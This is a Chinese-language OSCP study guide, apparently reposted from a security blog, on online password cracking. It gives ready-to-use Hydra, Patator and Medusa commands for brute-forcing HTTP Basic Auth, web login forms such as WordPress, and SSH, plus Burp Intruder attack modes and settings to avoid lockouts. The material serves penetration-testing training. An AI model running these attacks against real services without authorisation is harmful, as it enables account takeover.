文章总结: 本文作为OSCP认证备考指南,系统讲解了在线密码破解的核心技能。内容聚焦于Hydra、BurpSuite等工具,详细演示了针对HTTP/HTTPS表单登录及SSH服务的暴力破解方法与命令参数,为渗透测试人员提供了实用的技术参考和操作范例。
综合评分: 88
文章分类: 渗透测试,WEB安全,红队,实战经验,漏洞分析
OSCP必备技能7-密码在线破解篇
原创
玄鹄安全
高级红队专家
2025年12月3日 08:20
中国香港
本系列共18篇,涵盖OSCP认证考试所需全部技能点,本章为“技能7-密码在线破解篇”,技术交流可加微信群,资源免费共享可加QQ群:上车啦!| 微信②群聊天交流 | QQ群分享资料
一、HTTP/HTTPS Web登录暴力破解
1. Hydra(最常用)
基本语法
hydra -L <用户列表> -P <密码字典> <目标IP> <服务类型> <选项>
常见服务类型示例
1.1 基础认证(HTTP Basic Auth)
# 基础认证破解
hydra -L users.txt -P passwords.txt http-get /admin
hydra -L users.txt -P passwords.txt https-get /secure-area
# 指定端口
hydra -L users.txt -P passwords.txt 192.168.1.100 https-get -s 8443
1.2 表单登录(POST请求)
# WordPress后台
hydra -l admin -P rockyou.txt 192.168.1.100 http-post-form \
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"
# 自定义表单
hydra -L users.txt -P passwords.txt 192.168.1.100 http-post-form \
"/login.php:username=^USER^&password=^PASS^&submit=Login:F=Invalid login"
# 成功标识判断
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
"/login:user=^USER^&pass=^PASS^:S=Welcome:C=302"
1.3 参数说明
-L <文件> # 用户名字典文件
-P <文件> # 密码字典文件
-l <用户名> # 单个用户名
-p <密码> # 单个密码
-s <端口> # 非标准端口
-t <线程数> # 并发线程数(默认16)
-vV # 详细输出
-f # 找到第一个匹配后停止
-o <文件> # 结果输出到文件
2. Burp Suite Intruder
配置步骤
- 1. 拦截登录请求 → Send to Intruder
- 2. 设置攻击位置(Positions)
- 3. 配置载荷(Payloads)
- 4. 开始攻击
攻击类型
- • Sniper: 单参数攻击
- • Battering ram: 多参数相同载荷
- • Pitchfork: 多参数不同载荷
- • Cluster bomb: 多参数组合攻击
载荷设置示例
# 简单列表
admin
test
guest
root
# 数字组合
2020
2021
2022
2023
# 规则生成
Password1
Password2
...
Password100
3. Patator
语法特点
patator <模块名> host=<目标> <参数> <选项>
HTTP表单破解示例
# 基础用法
patator http_fuzz url= http://192.168.1.100/login.php \
method=POST body='username=FILE0&password=FILE1' \
0=users.txt 1=passwords.txt -x ignore:fgrep='Login failed'
# 带Cookie会话
patator http_fuzz url= http://192.168.1.100/admin.php \
method=POST header='Cookie: sessionid=123456' \
body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt
# 条件判断
patator http_fuzz url= http://192.168.1.100/login \
method=POST body='username=admin&password=FILE0' \
0=passwords.txt -x ignore:code=401
二、网络服务暴力破解
1. SSH登录破解
Hydra SSH破解
# 基础破解
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# 指定端口和选项
hydra -l root -P passwords.txt -s 2222 -t 4 ssh://192.168.1.100
# 使用已知用户名
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -vV
# 防止被屏蔽
hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -t 1 -w 30
Medusa SSH破解
# 多目标攻击
medusa -H hosts.txt -U users.txt -P passwords.txt -M ssh -T 10
# 单目标攻击
medusa -h 192.168.1.100 -u root -P passwords.txt -M ssh -t 5
# 自定义模块参数
medusa -h 192.168.1.100 -U users.txt -p Password123 -M ssh -m GROUP:wheel
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:高级红队专家 玄鹄安全《OSCP必备技能7-密码在线破解篇》